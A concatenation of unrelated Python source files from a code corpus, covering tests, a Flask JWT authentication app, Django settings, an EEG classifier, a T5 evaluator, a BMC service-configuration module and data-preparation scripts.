    assert not result.is_multivariate

    # Verify that chains are merged correctly: for each parameter, the
    # post-warmup slices of every chain are concatenated in chain order.
    for index, name in enumerate(parameter_names):
        merged = np.concatenate(
            [chains[chain, warmup:, index] for chain in range(n_chains)])
        assert np.allclose(merged, result.samples[name])

    assert hasattr(result, 'something')
    assert result.something_else == 'y'
@pytest.mark.parametrize('multivariate_model', [3], indirect=True)
def test_multivariate(multivariate_model):
    """Rejection sampling on a 3-dimensional parameter model."""
    n_samples = 10
    sampler = elfi.Rejection(multivariate_model['d'], batch_size=5)
    result = sampler.sample(n_samples)
    assert result.outputs['t1'].shape == (n_samples, 3)
    assert result.outputs['d'].shape == (n_samples,)
    assert result.is_multivariate
| StarcoderdataPython |
8197897 | <gh_stars>0
"""Faça um Programa que peça um número correspondente a um determinado ano e em seguida informe se este
ano é ou não bissexto"""
ano = int(input('Digite um ano parasaber se é bissexto: '))
if ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0:
print('O ano é Bissexto!')
else:
print('O ano Não é Bissexto!')
| StarcoderdataPython |
6686 | <reponame>natedogg484/react-flask-authentication
from flask import Flask
from flask_cors import CORS
from flask_restful import Api
from flask_sqlalchemy import SQLAlchemy
from flask_jwt_extended import JWTManager

# Application and extension wiring.  NOTE: statement order matters here --
# `models`/`resources`/`views` are imported only after `app`, `db` and `jwt`
# exist, presumably because those modules import them back from this
# module (confirm against models.py / resources.py).
app = Flask(__name__)
CORS(app)
api = Api(app)

app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///app.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
# NOTE(review): hard-coded secrets -- move these to environment
# configuration before any production deployment.
app.config['SECRET_KEY'] = 'some-secret-string'
app.config['JWT_SECRET_KEY'] = 'jwt-secret-string'
# Enable revocation (blacklist) checks for both access and refresh tokens.
app.config['JWT_BLACKLIST_ENABLED'] = True
app.config['JWT_BLACKLIST_TOKEN_CHECKS'] = ['access', 'refresh']

db = SQLAlchemy(app)
jwt = JWTManager(app)


@app.before_first_request
def create_tables():
    # Create all tables declared in `models` before serving the first request.
    db.create_all()


import models, resources, views

# REST endpoint registration.
api.add_resource(resources.UserRegistration, '/registration')
api.add_resource(resources.UserLogin, '/login')
api.add_resource(resources.UserLogoutAccess, '/logout/access')
api.add_resource(resources.UserLogoutRefresh, '/logout/refresh')
api.add_resource(resources.TokenRefresh, '/token/refresh')
api.add_resource(resources.AllUsers, '/users')
api.add_resource(resources.SecretResource, '/secret')


@jwt.token_in_blacklist_loader
def check_if_token_in_blacklist(decrypted_token):
    # Reject any token whose unique id (jti) has been revoked.
    jti = decrypted_token['jti']
    return models.RevokedTokenModel.is_jti_blacklisted(jti)
1666190 | <gh_stars>1-10
import pytest
from AcadeMeData.models import University, Degree, Professor, User, Course, MessageBoards
@pytest.fixture
def generate_university(university_id=5, name='The Technion', location="Haifa",
                        description="Best University in Israel"):
    """Persist and return a sample University record."""
    record = University(
        university_id=university_id,
        name=name,
        location=location,
        description=description,
    )
    record.save()
    return record
@pytest.fixture
def generate_degree(degree_id=1, name='History', universities="Ben Gurion University, Reichman University",
                    description="Learn about historic events and their influences on the world"):
    """Create (via the model factory), persist and return a sample Degree."""
    new_degree = Degree.create_degree(
        degree_id=degree_id,
        name=name,
        universities=universities,
        description=description,
    )
    new_degree.save()
    return new_degree
@pytest.fixture
def generate_professor(generate_university, professor_id=2, name="DR <NAME>",
                       description="A cool guy who looked familiar", rate=4.5):
    """Return a sample Professor affiliated with the university fixture."""
    return Professor.create_professor(
        professor_id=professor_id,
        name=name,
        university=generate_university,
        description=description,
        rate=rate,
    )
@pytest.fixture
def user_example():
    """Create and return a sample User.

    Bug fix: the original called ``User.create_user(*user_data)``, but
    unpacking a dict with ``*`` yields its *keys*, so the literal field
    names ('username', 'password', ...) -- not the sample values -- were
    passed as the positional arguments.  ``**user_data`` forwards the
    intended values as keyword arguments.
    """
    user_data = {'username': "username2212", 'password': "password", 'email': "<EMAIL>",
                 'university': "RU",
                 'degree': "CS"}
    user = User.create_user(**user_data)
    return user
@pytest.fixture
def generate_course(generate_degree, generate_professor, course_id=1, name="History of Countries",
                    mandatory=True, description="Learn about historic events and their influences on countries"):
    """Persist and return a sample Course tied to the degree/professor fixtures."""
    sample_course = Course.create_course(
        course_id=course_id,
        name=name,
        degree=generate_degree,
        mandatory=mandatory,
        description=description,
        professor=generate_professor,
    )
    sample_course.save()
    return sample_course
@pytest.fixture
def generate_msgboard(generate_course, id=1):
    """Persist and return a MessageBoards row for the course fixture."""
    board = MessageBoards(id=id, courseName=generate_course)
    board.save()
    return board
| StarcoderdataPython |
6681279 | from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.pipeline import Pipeline
from mne.decoding import CSP
from BIpy.data_processing import get_windows, LowpassWrapper
import numpy as np
class DummyClassifier:
    """Stand-in classifier used to exercise the BCI data flow in tests.

    Mimics the minimal interface a real classifier must provide: a
    ``window_size`` attribute and a ``predict_proba`` method.
    """

    def __init__(self):
        # Smallest possible window so callers feed single samples.
        self.window_size = 1

    def predict_proba(self, data):
        """Echo back the last element of ``data`` as the "probability".

        Fixes the original docstring, which claimed ``input[0]`` was
        returned while the code returns ``data[-1]``.  The debug print is
        intentional: this class exists purely for manual testing.
        """
        print('predict_proba:', data)
        return data[-1]
# window size in samples, not seconds
def get_trained_CSP_LDA(data, labels, window_size=None, preprocessing=None, step_size=None):
    """Returns a trained sklearn pipeline of [preprocessing, csp, lda]

    Parameters
    ----------
    data : np.array
        Data to train the classifier on
        Shape (trials, channels, time)
    labels : np.array
        1d array of labels to the training data
    window_size : int
        Size in samples (not seconds) the classifier should be trained on
        If None, the function will train with each entire trial as input
        Default None
    preprocessing : object implementing fit_transform and transform
        Preprocessing step to add at the beginning of the sklearn pipeline
        Defaults to a fresh BIpy.data_processing.LowpassWrapper()
    step_size : int, default None
        Stride/step size passed to BIpy.data_processing.get_windows()
        If None, classifier will be trained on raw data and get_windows() is never used

    Returns
    -------
    clf
        A trained csp + lda Pipeline
    """
    # Build the default inside the body: a default argument is evaluated
    # once at import time, so a single (stateful) transformer instance
    # would be shared -- and refit -- across every call to this function.
    if preprocessing is None:
        preprocessing = LowpassWrapper()

    # slide window over trial data to generate many more data points
    if step_size and window_size and window_size < data.shape[-1]:
        data, labels = get_windows(data, labels, window_size, step_size)

    # make pipeline: preprocessing -> CSP spatial filtering -> LDA
    preproc = preprocessing
    lda = LinearDiscriminantAnalysis()
    csp = CSP(n_components=10, reg=None, log=None, norm_trace=False, component_order='alternate')
    clf = Pipeline([(str(preproc), preproc), ('CSP', csp), ('LDA', lda)])

    # train model
    clf.fit(data, labels)

    # return trained model
    return clf
# [NOTE]: extend this so it generalizes to gel eeg
class WrappedCSPLDAClassifier():
    """Wrapper class for using an sklearn csp+lda pipeline in a BIpy.bci.ClassifierProcess

    Methods
    -------
    predict_proba(self, window: np.array)
        takes the output from a WindowInlet and returns the probability (according to the csp+lda classifier) that the right hand was imagined
    fit(self, data, labels)
        calls fit(data, labels) on the csp+lda classifier
    """

    def __init__(self, data_channels=None, window_size=1000, preprocessing=None):
        """
        Parameters
        ----------
        data_channels : list of int, optional
            Channels that the classifier should use as input.
            Defaults to list(range(20)).
        window_size : int, default 1000
            number of samples of eeg data the classifier should use as input
        preprocessing : optional
            Step added to the start of the csp+lda sklearn pipeline.
            Defaults to a fresh LowpassWrapper().
        """
        # Build mutable defaults in the body: a list or transformer instance
        # created in the signature is evaluated once at import time and
        # would be shared by every instance of this class.
        if data_channels is None:
            data_channels = list(range(20))
        if preprocessing is None:
            preprocessing = LowpassWrapper()

        self.window_size = window_size
        self.data_channels = data_channels

        # make pipeline: preprocessing -> CSP -> LDA
        preproc = preprocessing
        lda = LinearDiscriminantAnalysis()
        csp = CSP(n_components=10, reg=None, log=None, norm_trace=False, component_order='alternate')
        self.clf = Pipeline([(str(preproc), preproc), ('CSP', csp), ('LDA', lda)])

    def predict_proba(self, window: np.array):
        """takes the output from a WindowInlet and returns the probability (according to the csp+lda classifier) that the right hand was imagined"""
        # Transpose to (channels, time) and keep only the configured channels.
        data = np.transpose(np.array(window))[self.data_channels]
        print('data shape in wrapped:', data.shape)
        proba = self.clf.predict_proba(data)
        return proba[0][1]  # proba = [[prob_left, prob_right]]

    def fit(self, data, labels):
        """calls fit(data, labels) on the csp+lda classifier"""
        self.clf.fit(data, labels)
| StarcoderdataPython |
135879 | from .profile import profile_getaddrinfo, profile_getaddrinfo_async | StarcoderdataPython |
72907 | import logging
import os
import torch
from dataset import MonoDataset
from torch.utils.data import DataLoader
from tqdm import tqdm
from transformers import T5ForConditionalGeneration
from transformers import T5Tokenizer
from utils import calculate_bleu_score
from utils import load_config
from finetune_t5 import EXPERIMENT_CONFIG_NAME
# Let every record through the root logger; handlers decide what to emit.
logging.root.setLevel(logging.NOTSET)
class Evaluator:
"""
This is an evaluator class for evaluating a t5 huggingface model on a parallel test set
Attributes:
model_config: model configuration
train_config: training configuration
data_config: data paths configuration
experiment_path: path where experiment output will be dumped
tokenizer: tokenizer
src_test_generator: data generator for source test sentences
tgt_test: list of target test sentences
device: device where experiment will happen (gpu or cpu)
"""
def __init__(
self,
experiment_path: str,
src_test_path: str,
tgt_test_path: str,
save_as_pretrained: bool = False,
):
self._check_inputs(experiment_path)
config = load_config(os.path.join(experiment_path, EXPERIMENT_CONFIG_NAME))
self.model_config = config["model"]
self.train_config = config["training"]
self.data_config = config["data"]
self.experiment_path = experiment_path
if self.model_config["tokenizer_path"]:
self.tokenizer = T5Tokenizer.from_pretrained(self.model_config["tokenizer_path"])
else:
logging.warning(
f"No tokenizer path inputed, using {self.model_config['model_size']} default pretrained tokenizer"
)
self.tokenizer = T5Tokenizer.from_pretrained(self.model_config["model_size"])
self.device = torch.device(
"cuda" if self.train_config["use_cuda"] and torch.cuda.is_available() else "cpu"
)
self._load_model(experiment_path, save_as_pretrained)
self.src_test_generator, self.tgt_test = self._create_datasets(src_test_path, tgt_test_path)
def _load_model(self, experiment_path: str, save_as_pretrained: bool) -> None:
"""
Loads trained model weights and saves as a huggingface pretrained model if specified.
"""
logging.info("Loading model...")
model_config = {
"early_stopping": self.train_config["early_stopping"],
"max_length": self.train_config["max_output_length"],
"num_beams": self.train_config["beam_size"],
"prefix": self.data_config["src_prefix"],
"vocab_size": self.tokenizer.vocab_size,
}
self.model = T5ForConditionalGeneration.from_pretrained(self.model_config["model_size"])
self.model.config.update(model_config)
checkpoint = torch.load(os.path.join(experiment_path, "best_model.pt"))
self.model.load_state_dict(checkpoint["model_state"])
self.model.to(self.device)
if save_as_pretrained:
pretrained_path = os.path.join(experiment_path, "best_model.bin")
self.model.save_pretrained(pretrained_path)
logging.info(
f"Loaded model saved as pretrained model in path: {pretrained_path} ! Can now be loaded with: 'model.from_pretrained(path)' "
)
def _create_datasets(self, src_test_path: str, tgt_test_path: str) -> tuple:
"""
Creates source test data generator and target reference data.
"""
src_test = [
self.model.config.prefix + text.strip() + " </s>" for text in list(open(src_test_path))
]
tgt_test = [text.strip() for text in list(open(tgt_test_path))]
assert len(src_test) == len(
tgt_test
), "Source and Target data must have the same number of sentences"
logging.info(f"Evaluating on datasets of {len(src_test)} sentences each...")
src_test_dict = self.tokenizer.batch_encode_plus(
src_test,
max_length=self.train_config["max_output_length"],
return_tensors="pt",
pad_to_max_length=True,
)
params = {
"batch_size": self.train_config["batch_size"],
"shuffle": False,
"num_workers": self.train_config["num_workers_data_gen"],
}
input_test_ids = src_test_dict["input_ids"]
src_test_generator = DataLoader(MonoDataset(input_test_ids), **params)
all_data = (src_test_generator, tgt_test)
return all_data
def evaluate(self) -> None:
"""
Evaluate test data according to bleu score.
"""
logging.info(f"Evaluating model with this configuration: \n {self.model.config}")
# generate predictions and calculate bleu score
hyps = []
self.model.eval()
with torch.no_grad():
for batch in tqdm(self.src_test_generator):
batch = batch.to(self.device)
translations = self.model.generate(input_ids=batch)
decoded = [
self.tokenizer.decode(
translation, skip_special_tokens=True, clean_up_tokenization_spaces=False
)
for translation in translations
]
hyps = hyps + decoded
bleu_score = calculate_bleu_score(hyps, self.tgt_test)
logging.info(f"BLEU score on test data is: {bleu_score:.2f}")
# write hypothesis to file
hyps_path = os.path.join(self.experiment_path, f"model_test_hyps_bleu:{bleu_score:.2f}.txt")
with open(hyps_path, "w") as file:
for sent in hyps:
file.write(sent + " \n")
logging.info(f"Model hypothesis saved in {hyps_path}")
def _check_inputs(self, experiment_path: str) -> None:
    """
    Check that the experiment path contains the files needed for evaluation:
    the trained model checkpoint and the experiment configuration file.
    """
    # Directory entries are unique, so a membership test is equivalent to
    # counting exact matches of "best_model.pt" and requiring one.
    entries = os.listdir(experiment_path)
    assert "best_model.pt" in entries, "A single model file must exist and be named as 'best_model.pt' "
    # The experiment configuration must live alongside the model file.
    config_path = os.path.join(experiment_path, EXPERIMENT_CONFIG_NAME)
    assert os.path.isfile(config_path), f"Configuration file must exist in experiment path as {EXPERIMENT_CONFIG_NAME}"
| StarcoderdataPython |
11321688 | <gh_stars>1-10
###
# Copyright 2021 New H3C Technologies Co., Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
# -*- coding: utf-8 -*-
from exception.ToolException import FailException
from utils.client import RestfulClient
from utils.common import Constant
from utils.tools import init_args
from utils.model import BaseModule
class SetService(BaseModule):
    """Configure BMC network protocol services (e.g. Web, IPMI) through the
    Restful API.

    Successes are collected in ``self.suc_list`` and failures in
    ``self.err_list`` (both provided by :class:`BaseModule`).
    """

    def __init__(self):
        super().__init__()
        # Names of the command-line arguments this module consumes.
        self.args_lst = [
            "service_type",
            "status",
            "non_secure_port",
            "secure_port",
            "timeout"
        ]

    def run(self, args):
        """Fetch the current service list, locate the requested service and
        apply the new settings with a PUT request.

        :param args: parsed command-line namespace
        :return: list of success messages
        :raises FailException: if any step fails
        """
        init_args(args, self.args_lst)
        # flag is True for the Web/IPMI services, whose PUT responses are
        # validated more leniently below.
        flag = self.check_args(args)
        client = RestfulClient(args)
        url = "/api/settings/services"
        try:
            resp = client.send_request("GET", url)
            if resp and isinstance(resp, list):
                for service in resp:
                    if service.get("service_name", None) == args.service_type:
                        url, payload = (self.construct_request_parameters(
                            service, url, args))
                        resp = client.send_request("PUT", url, payload)
                        # For Web/IPMI (flag=True) a FAILED_1306 code is also
                        # accepted as success; otherwise only SUCCESS_0 counts.
                        if (isinstance(resp, dict) and
                                ((resp.get("code") == Constant.FAILED_1306 or
                                  resp.get("cc") ==
                                  Constant.SUCCESS_0) if flag else resp.get(
                                    "cc") == Constant.SUCCESS_0)):
                            suc_info = ("Success: set BMC network protocol "
                                        "services successfully")
                            self.suc_list.append(suc_info)
                        else:
                            err_info = "Failure: service setup failed"
                            self.err_list.append(err_info)
                        break
                else:
                    # for/else: no service matched args.service_type
                    err_info = "Failure: the service item was not found"
                    self.err_list.append(err_info)
            else:
                err_info = ("Failure: failed to get service configuration "
                            "information")
                self.err_list.append(err_info)
            if self.err_list:
                raise FailException(*self.err_list)
        finally:
            # Always close the session opened by RestfulClient.
            if client.cookie:
                client.delete_session()
        return self.suc_list

    def check_args(self, args):
        """Validate argument combinations for the selected service.

        Enabling/disabling the Web or IPMI service is rejected outright
        (the error text warns of "serious consequences").

        :param args: parsed command-line namespace
        :return: True when the service is Web or IPMI, False otherwise
        :raises FailException: when --status is given for Web/IPMI
        """
        flag = False
        if args.service_type == "Web":
            flag = True
            if args.status is not None:
                err_info = ("Argument: invalid choice: %s (may cause serious "
                            "consequences)" % args.status)
                self.err_list.append(err_info)
                raise FailException(*self.err_list)
        if args.service_type == "IPMI":
            flag = True
            if args.status is not None:
                err_info = ("Argument: invalid choice: %s (may cause serious "
                            "consequences)" % args.status)
                self.err_list.append(err_info)
                raise FailException(*self.err_list)
        return flag

    def construct_request_parameters(self, service, url, args):
        """Merge the requested changes into the service's current settings.

        :param service: current settings dict returned by the GET request
        :param url: base services URL; the service id is appended
        :param args: parsed command-line namespace
        :return: (per-service URL, payload dict)
        :raises FailException: when a requested field is not supported
        """
        payload = service
        if args.status is not None:
            payload["state"] = (1 if args.status == "Enabled" else 0)
        if args.non_secure_port is not None:
            # A missing or -1 port means the service exposes no such port.
            if (payload.get("non_secure_port", None) is None or payload.get(
                    "non_secure_port", None) == -1):
                err_info = ("Argument: invalid choice: %s (parameter not "
                            "available)" % args.non_secure_port)
                self.err_list.append(err_info)
            else:
                payload["non_secure_port"] = args.non_secure_port
        if args.secure_port is not None:
            if (payload.get("secure_port", None) is None or payload.get(
                    "secure_port", None) == -1):
                err_info = ("Argument: invalid choice: %s (parameter not "
                            "available)" % args.secure_port)
                self.err_list.append(err_info)
            else:
                payload["secure_port"] = args.secure_port
        if args.timeout is not None:
            if args.timeout < 5 or args.timeout > 30:
                err_info = ("Argument: invalid choice: %s (choose from 5 to "
                            "30)" % args.timeout)
                self.err_list.append(err_info)
            else:
                # timeout appears to be minutes converted to seconds (x60)
                # for the API — confirm units against the BMC documentation.
                payload["time_out"] = args.timeout * 60
        url = "%s/%s" % (url, payload.get("id"))
        if self.err_list:
            raise FailException(*self.err_list)
        return url, payload
| StarcoderdataPython |
9685787 | <reponame>alexdlaird/twilio-taskrouter-demo
"""
Settings common to all deployment methods.
"""
import os
import socket
from conf.settings import PROJECT_ID
__author__ = '<NAME>'
__copyright__ = 'Copyright 2018, <NAME>'
__version__ = '0.2.1'
# Define the base working directory of the application
BASE_DIR = os.path.normpath(os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', '..'))
# ############################
# Project configuration
# ############################
# Project information
PROJECT_NAME = os.environ.get('TWILTWIL_NAME')
PROJECT_HOST = os.environ.get('TWILTWIL_HOST')
# Version information
PROJECT_VERSION = __version__
#############################
# Default lists for host-specific configurations
#############################
INSTALLED_APPS = (
# Django modules
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
'django.contrib.sitemaps',
# Third-party modules
'pipeline',
'widget_tweaks',
'rest_framework',
# Project modules
'twiltwil.common',
'twiltwil.auth',
'twiltwil.portal',
'twiltwil.api',
)
MIDDLEWARE = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
TEMPLATES = [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request',
'twiltwil.common.handlers.processors.template',
],
'debug': os.environ.get('TWILTWIL_TEMPLATE_DEBUG', 'False') == 'True'
},
}]
#############################
# Django configuration
#############################
# Application definition
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
AUTH_USER_MODEL = 'twiltwil_auth.User'
LOGIN_URL = '/'
LOGOUT_URL = '/logout'
ROOT_URLCONF = 'conf.urls'
WSGI_APPLICATION = 'conf.wsgi.application'
HOSTNAME = socket.gethostname()
# Internationalization
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_THOUSAND_SEPARATOR = True
USE_TZ = True
HE_DATE_STRING = "%Y-%m-%d"
HE_TIME_STRING = "%H:%M:%S"
HE_DATE_TIME_STRING = HE_DATE_STRING + " " + HE_TIME_STRING
# Email settings
ADMIN_EMAIL_ADDRESS = os.environ.get('TWILTWIL_ADMIN_EMAIL')
SERVER_EMAIL = ADMIN_EMAIL_ADDRESS
EMAIL_USE_TLS = os.environ.get('TWILTWIL_EMAIL_USE_TLS', 'True') == 'True'
EMAIL_PORT = os.environ.get('TWILTWIL_EMAIL_PORT')
EMAIL_ADDRESS = os.environ.get('TWILTWIL_CONTACT_EMAIL')
DEFAULT_FROM_EMAIL = f'{PROJECT_NAME} <{EMAIL_ADDRESS}>'
EMAIL_HOST = os.environ.get('TWILTWIL_EMAIL_HOST')
EMAIL_HOST_USER = os.environ.get('TWILTWIL_EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = os.environ.get('TWILTWIL_EMAIL_HOST_PASSWORD')
# Authentication
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Security
SECRET_KEY = os.environ.get('TWILTWIL_SECRET_KEY')
CSRF_COOKIE_SECURE = os.environ.get('TWILTWIL_CSRF_COOKIE_SECURE', 'True') == 'True'
SESSION_COOKIE_SECURE = os.environ.get('TWILTWIL_SESSION_COOKIE_SECURE', 'True') == 'True'
ALLOWED_HOSTS = os.environ.get('TWILTWIL_ALLOWED_HOSTS').split(' ')
CSRF_MIDDLEWARE_SECRET = os.environ.get('TWILTWIL_CSRF_MIDDLEWARE_SECRET')
# Logging
DEBUG = os.environ.get('TWILTWIL_DEBUG', 'False') == 'True'
# Static files (CSS, JavaScript, Images)
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATICFILES_STORAGE = 'pipeline.storage.PipelineStorage'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'pipeline.finders.PipelineFinder',
)
# Media files
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
# Pipelines
PIPELINE = {
'DISABLE_WRAPPER': True,
'STYLESHEETS': {
'base': {
'source_filenames': (
'css/base.css',
),
'output_filename': f'css/{PROJECT_ID}_base_{PROJECT_VERSION}.min.css'
},
'portal': {
'source_filenames': (
'css/portal.css',
),
'output_filename': f'css/{PROJECT_ID}_portal_{PROJECT_VERSION}.min.css'
},
},
'JAVASCRIPT': {
'portal': {
'source_filenames': (
'js/api.js',
'js/portal.js',
),
'output_filename': f'js/{PROJECT_ID}_portal_{PROJECT_VERSION}.min.js'
},
}
}
# Twilio
TWILIO_ACCOUNT_SID = os.environ.get('TWILTWIL_TWILIO_ACCOUNT_SID')
TWILIO_AUTH_TOKEN = os.environ.get('TWILTWIL_TWILIO_AUTH_TOKEN')
TWILIO_PHONE_NUMBER = os.environ.get('TWILTWIL_TWILIO_PHONE_NUMBER')
TWILIO_API_KEY = os.environ.get('TWILTWIL_TWILIO_API_KEY')
TWILIO_API_SECRET = os.environ.get('TWILTWIL_TWILIO_API_SECRET')
TWILIO_API_BASE_URL = os.environ.get('TWILTWIL_TWILIO_API_BASE_URL', None)
TWILIO_EVENT_BRIDGE_BASE_URL = os.environ.get('TWILTWIL_TWILIO_EVENT_BRIDGE_BASE_URL', None)
TWILIO_REGION = os.environ.get('TWILTWIL_TWILIO_REGION', None)
# Other
DISABLE_LOBBY_VIDEO = os.environ.get('TWILTWIL_DISABLE_LOBBY_VIDEO', 'False') == 'True'
MAX_HTTP_RETRIES = os.environ.get('TWILTWIL_MAX_HTTP_RETRIES', 5)
| StarcoderdataPython |
372958 | # Import Modules
# Import Modules
import gc
import os
import numpy as np
import pandas as pd
import shutil
import tensorflow as tf

from utils import *
from tqdm import tqdm

# Constants
patch_size = 1024
generate_stage2 = False  # Generate Stage 1 ... OR ... Generate Stage 2 based on Pseudo Labelling

# Required Folders - Modify these if required to fit your local folder structure
root_dir = 'C:/KaggleHuBMAP/'
train_data_dir = f'{root_dir}train/'  # Folder for official Kaggle HuBMAP Train Data
test_data_dir = f'{root_dir}test/'  # Folder for official Kaggle HuBMAP Test Data. Used for Pseudo Labelling Stage2
ext1_data_dir = f'{root_dir}ext1/'  # External data: glomeruli-hubmap-external-1024x1024
ext2_data_dir = f'{root_dir}ext2/'  # External data: HuBMAP consortium portal datasets
tfrecords_dir = f'{root_dir}tfrecords/'  # Output directory for created TFRecords
tfrecords_train_dir = f'{tfrecords_dir}train/'
tfrecords_test_dir = f'{tfrecords_dir}test/'
tfrecords_ext1_dir = f'{tfrecords_dir}ext1/'
tfrecords_ext2_dir = f'{tfrecords_dir}ext2/'


def process_masked_tiff_dataset(df, mask_column, data_dir, out_dir):
    """
    Cut every TIFF image listed in `df` into patches and write TFRecords.

    This replaces the same loop previously copy-pasted three times (train,
    pseudo-labelled test, pseudo-labelled ext2); only the dataframe, the RLE
    mask column name and the directories differ.

    Args:
        df: dataframe with an 'id' column and `mask_column` holding RLE masks
        mask_column: name of the column with the run-length-encoded mask
        data_dir: directory containing '<id>.tiff' images
        out_dir: output directory for TFRecords and per-image patch CSVs
    """
    image_count = df.shape[0]
    for image_index in tqdm(range(image_count), total=image_count):
        # Get Image ID and the corresponding TIFF image
        image_id = df['id'][image_index]
        image = get_tiff_image(f'{data_dir}{image_id}.tiff')
        # Decode the RLE mask at the image's own resolution
        mask = rle2mask(df[mask_column][image_index], (image.shape[1], image.shape[0]))
        # Create patches / TFRecords and the per-image patch dataframe
        patch_df = write_tfrecord_tiles_v1(image_id, image, mask, patch_size, out_dir)
        patch_df.to_csv(f'{out_dir}{image_id}_patches.csv', index=False)
        # Clean memory between (very large) images
        gc.collect()


# Prepare TFRecords and Dataset Output Dir
clean_and_prepare_dir(tfrecords_dir)
# Only generate stage 1 train files
if not generate_stage2:
    clean_and_prepare_dir(tfrecords_train_dir)
    clean_and_prepare_dir(tfrecords_ext1_dir)
# Only generate stage 2 train files
else:
    clean_and_prepare_dir(tfrecords_test_dir)
    clean_and_prepare_dir(tfrecords_ext2_dir)

#### STAGE 1 ###########################################################################################################################
if not generate_stage2:
    # Official Kaggle train images with ground-truth masks
    train_df = pd.read_csv(f'{root_dir}train.csv')
    print(train_df.shape)
    process_masked_tiff_dataset(train_df, 'encoding', train_data_dir, tfrecords_train_dir)

    # First external dataset ships pre-cut 1024x1024 images and masks
    ext1_images = os.listdir(f'{ext1_data_dir}images_1024/')
    patch_df = write_tfrecord_tiles_v2(ext1_images, ext1_data_dir, tfrecords_ext1_dir)
    patch_df.to_csv(f'{tfrecords_ext1_dir}ext1_patches.csv', index=False)
    gc.collect()

    # Create Final Zip File for upload to Kaggle Datasets
    shutil.make_archive(f'{root_dir}train_files_stage1', 'zip', root_dir=tfrecords_dir, base_dir='./')

#### STAGE 2 ###########################################################################################################################
if generate_stage2:
    # Official Kaggle public test images, pseudo-labelled by an ensemble of
    # models; the predictions .csv holds the masks we re-use as labels.
    test_df = pd.read_csv(f'{root_dir}pseudolabel_test.csv')
    print(test_df.shape)
    process_masked_tiff_dataset(test_df, 'predicted', test_data_dir, tfrecords_test_dir)

    # Second external dataset, pseudo-labelled the same way
    ext2_df = pd.read_csv(f'{root_dir}pseudolabel_ext2.csv')
    print(ext2_df.shape)
    process_masked_tiff_dataset(ext2_df, 'predicted', ext2_data_dir, tfrecords_ext2_dir)

    # Create Final Zip File for upload to Kaggle Datasets
    shutil.make_archive(f'{root_dir}train_files_stage2', 'zip', root_dir=tfrecords_dir, base_dir='./')

# Final
print('=== Finished Training Files Processing')
9654597 | <reponame>mano8/utils<gh_stars>0
# -*- coding: utf-8 -*-
"""
UType unittest class.
Use pytest package.
"""
import pytest
from ve_utils.utype import UType as Ut
class TestUType:
    """UType unittest class."""

    def test_has_valid_length(self):
        """Test has_valid_length method"""
        assert Ut.has_valid_length(test=True, value='tst')
        assert Ut.has_valid_length(test=True, value='tst', not_null=True)
        assert Ut.has_valid_length(test=True, value='tst', mini=1, maxi=3)
        assert Ut.has_valid_length(test=True, value='tst', mini=3, maxi=3)
        # eq takes precedence over mini/maxi
        assert Ut.has_valid_length(test=True, value='tst', eq=3, mini=4, maxi=6)
        assert not Ut.has_valid_length(test=True, value='', not_null=True)
        assert not Ut.has_valid_length(test=True, value='', mini=1)
        assert not Ut.has_valid_length(test=True, value='aaa', maxi=1)
        assert not Ut.has_valid_length(test=False, value='tst')
        # invalid mini/maxi/eq combinations raise AttributeError
        with pytest.raises(AttributeError):
            Ut.has_valid_length(test=True, value='tst', mini=-1, maxi=2)
        with pytest.raises(AttributeError):
            Ut.has_valid_length(test=False, value='tst', mini=-1, maxi=2)
        with pytest.raises(AttributeError):
            Ut.has_valid_length(test=False, value='tst', mini=0, maxi=0)
        with pytest.raises(AttributeError):
            Ut.has_valid_length(test=False, value='tst', mini=5, maxi=2)
        with pytest.raises(AttributeError):
            Ut.has_valid_length(test=False, value='tst', eq=-1)
        with pytest.raises(TypeError):
            assert Ut.has_valid_length(test=True, value=None, not_null=True)

    def test_has_valid_value(self):
        """Test has_valid_value method"""
        assert Ut.has_valid_value(test=True, value=1)
        assert Ut.has_valid_value(test=True, value=-2, not_null=True)
        assert Ut.has_valid_value(test=True, value=1, mini=1, maxi=3)
        assert Ut.has_valid_value(test=True, value=3, mini=3, maxi=3)
        assert Ut.has_valid_value(test=True, value=3, eq=3)
        assert Ut.has_valid_value(test=True, value=3, positive=True)
        assert Ut.has_valid_value(test=True, value=-3, negative=True)
        assert not Ut.has_valid_value(test=True, value=0, not_null=True)
